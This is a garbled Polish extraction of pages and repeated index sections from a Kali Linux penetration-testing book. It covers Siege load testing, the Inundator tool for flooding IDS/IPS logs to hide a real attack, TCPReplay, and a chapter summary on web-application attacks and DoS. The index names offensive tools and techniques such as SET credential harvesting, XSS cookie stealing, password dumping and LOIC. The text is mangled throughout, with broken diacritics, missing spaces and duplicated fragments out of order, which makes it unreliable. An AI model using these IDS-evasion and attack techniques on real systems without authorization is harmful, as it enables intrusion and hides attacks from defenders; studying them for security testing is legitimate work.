ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
